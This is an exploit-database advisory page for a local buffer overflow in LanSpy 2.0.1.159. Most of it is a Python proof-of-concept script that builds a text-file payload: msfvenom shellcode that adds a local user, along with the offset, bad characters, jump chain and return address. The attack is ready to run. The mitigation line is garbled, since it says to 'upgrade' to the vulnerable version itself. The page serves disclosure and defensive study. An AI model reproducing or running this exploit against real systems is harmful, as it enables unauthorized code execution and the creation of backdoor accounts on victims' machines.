LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC)

vendor:

LanSpy

by:

Juan Prescotto

9.3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: LanSpy

Affected Version From: 2.0.1.159

Affected Version To: 2.0.1.159

Patch Exists: YES

Related CWE: N/A

CPE: a:lizardsystems:lanspy:2.0.1.159

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows

2018

LanSpy 2.0.1.159 – Local Buffer Overflow RCE(PoC)

LanSpy 2.0.1.159 is vulnerable to a local buffer overflow vulnerability. This vulnerability can be exploited by an attacker to execute arbitrary code on the target system. The vulnerability exists due to insufficient boundary checks when processing user-supplied input. An attacker can exploit this vulnerability by crafting a malicious file and sending it to the target system. When the file is opened, the attacker can execute arbitrary code on the target system.

Mitigation:

Upgrade to the latest version of LanSpy 2.0.1.159 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC)                                                                         #
# Date: 2018-12-16                                                                                                                   #
# Author: Juan Prescotto                                                                                                             #
# Tested Against: Win7 Pro SP1 64 bit                                                                                                #
# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe                  #
# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe                                                          # 
# Version: 2.0.1.159                                                                                                                 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine                                            #
# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit #
# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script            #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: \x00 thru \x20 and \x2c\x2d                                                                                         #
# EIP Offset: 680                                                                                                                    #
# Non-Participating Modules: lanspy.exe                                                                                              #
#------------------------------------------------------------------------------------------------------------------------------------#
# Run LanSpy with Administrative Rights, when exploit.txt contents are pasted into scan field and run a Local User will be created:  #
# User: Metasploit    Password: MyPassword12                                                                                         #
#------------------------------------------------------------------------------------------------------------------------------------#
# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#

#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c --format python -v shellcode
#Payload size: 626 bytes

shellcode =  ""
shellcode += "\x89\xe5\xda\xd1\xd9\x75\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x39\x78\x6b\x32\x65\x50\x45\x50\x73\x30"
shellcode += "\x31\x70\x6d\x59\x58\x65\x36\x51\x4f\x30\x43\x54"
shellcode += "\x6c\x4b\x56\x30\x70\x30\x6e\x6b\x63\x62\x54\x4c"
shellcode += "\x4e\x6b\x66\x32\x65\x44\x6c\x4b\x54\x32\x47\x58"
shellcode += "\x76\x6f\x68\x37\x30\x4a\x31\x36\x75\x61\x69\x6f"
shellcode += "\x6e\x4c\x75\x6c\x35\x31\x43\x4c\x55\x52\x36\x4c"
shellcode += "\x45\x70\x4b\x71\x78\x4f\x76\x6d\x65\x51\x69\x57"
shellcode += "\x6d\x32\x4c\x32\x33\x62\x53\x67\x4c\x4b\x61\x42"
shellcode += "\x42\x30\x6c\x4b\x31\x5a\x47\x4c\x6e\x6b\x50\x4c"
shellcode += "\x52\x31\x54\x38\x6a\x43\x47\x38\x75\x51\x7a\x71"
shellcode += "\x46\x31\x4c\x4b\x36\x39\x35\x70\x47\x71\x38\x53"
shellcode += "\x4e\x6b\x43\x79\x67\x68\x39\x73\x35\x6a\x73\x79"
shellcode += "\x4e\x6b\x34\x74\x6c\x4b\x75\x51\x6a\x76\x35\x61"
shellcode += "\x4b\x4f\x4c\x6c\x7a\x61\x48\x4f\x64\x4d\x67\x71"
shellcode += "\x68\x47\x37\x48\x6b\x50\x32\x55\x39\x66\x33\x33"
shellcode += "\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x65\x74\x52\x55"
shellcode += "\x38\x64\x73\x68\x6e\x6b\x46\x38\x75\x74\x73\x31"
shellcode += "\x78\x53\x72\x46\x6e\x6b\x54\x4c\x30\x4b\x6e\x6b"
shellcode += "\x63\x68\x75\x4c\x36\x61\x58\x53\x6e\x6b\x47\x74"
shellcode += "\x6c\x4b\x35\x51\x68\x50\x4b\x39\x50\x44\x46\x44"
shellcode += "\x54\x64\x61\x4b\x73\x6b\x53\x51\x56\x39\x43\x6a"
shellcode += "\x53\x61\x6b\x4f\x79\x70\x63\x6f\x53\x6f\x62\x7a"
shellcode += "\x4e\x6b\x54\x52\x5a\x4b\x4e\x6d\x61\x4d\x72\x4a"
shellcode += "\x46\x61\x6c\x4d\x4d\x55\x78\x32\x57\x70\x55\x50"
shellcode += "\x63\x30\x52\x70\x62\x48\x34\x71\x6c\x4b\x32\x4f"
shellcode += "\x4b\x37\x59\x6f\x4e\x35\x6d\x6b\x6c\x30\x78\x35"
shellcode += "\x6e\x42\x71\x46\x61\x78\x59\x36\x6d\x45\x4f\x4d"
shellcode += "\x6f\x6d\x79\x6f\x4e\x35\x57\x4c\x57\x76\x43\x4c"
shellcode += "\x57\x7a\x4d\x50\x4b\x4b\x4d\x30\x61\x65\x43\x35"
shellcode += "\x4d\x6b\x31\x57\x54\x53\x44\x32\x52\x4f\x33\x5a"
shellcode += "\x75\x50\x72\x73\x4b\x4f\x69\x45\x73\x53\x50\x6d"
shellcode += "\x62\x44\x54\x6e\x51\x75\x44\x38\x65\x35\x31\x30"
shellcode += "\x66\x4f\x35\x33\x31\x30\x42\x4e\x33\x55\x61\x64"
shellcode += "\x77\x50\x52\x55\x63\x43\x50\x65\x61\x62\x67\x50"
shellcode += "\x52\x4d\x51\x75\x54\x34\x73\x51\x61\x63\x70\x70"
shellcode += "\x50\x6c\x70\x6f\x63\x59\x64\x34\x55\x70\x50\x4d"
shellcode += "\x31\x69\x50\x50\x70\x61\x74\x33\x44\x33\x54\x37"
shellcode += "\x42\x4f\x34\x32\x73\x54\x34\x71\x54\x72\x67\x50"
shellcode += "\x54\x6f\x32\x61\x51\x54\x77\x34\x71\x30\x76\x46"
shellcode += "\x36\x46\x31\x30\x30\x6e\x51\x75\x31\x64\x55\x70"
shellcode += "\x70\x6c\x42\x4f\x70\x63\x70\x61\x70\x6c\x70\x67"
shellcode += "\x72\x52\x30\x6f\x72\x55\x44\x30\x35\x70\x51\x51"
shellcode += "\x73\x54\x42\x4d\x55\x39\x72\x4e\x50\x69\x71\x63"
shellcode += "\x32\x54\x34\x32\x31\x71\x70\x74\x50\x6f\x54\x32"
shellcode += "\x64\x33\x51\x30\x30\x6d\x35\x35\x64\x34\x70\x61"
shellcode += "\x70\x73\x32\x50\x32\x4c\x70\x6f\x45\x39\x71\x64"
shellcode += "\x77\x50\x56\x4f\x72\x61\x43\x74\x63\x74\x63\x30"
shellcode += "\x41\x41"

if len(shellcode) > 633:
	exit("[+] Shellcode is too big! Shellcode must be smaller than 633 bytes")

sled = "\x90" * 8

#Necessary to allow shellcode room to operate
stack_adjust = "\x83\xec\x78" * 10

reverse_jmp_long = "\xe9\x5c\xfd\xff\xff"

reverse_jmp_short = "\x41\xeb\xf6\x41"

junk = "\x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short))

#004040AD JMP ECX (lanspy.exe)
eip = "\xad\x40\x40"

payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"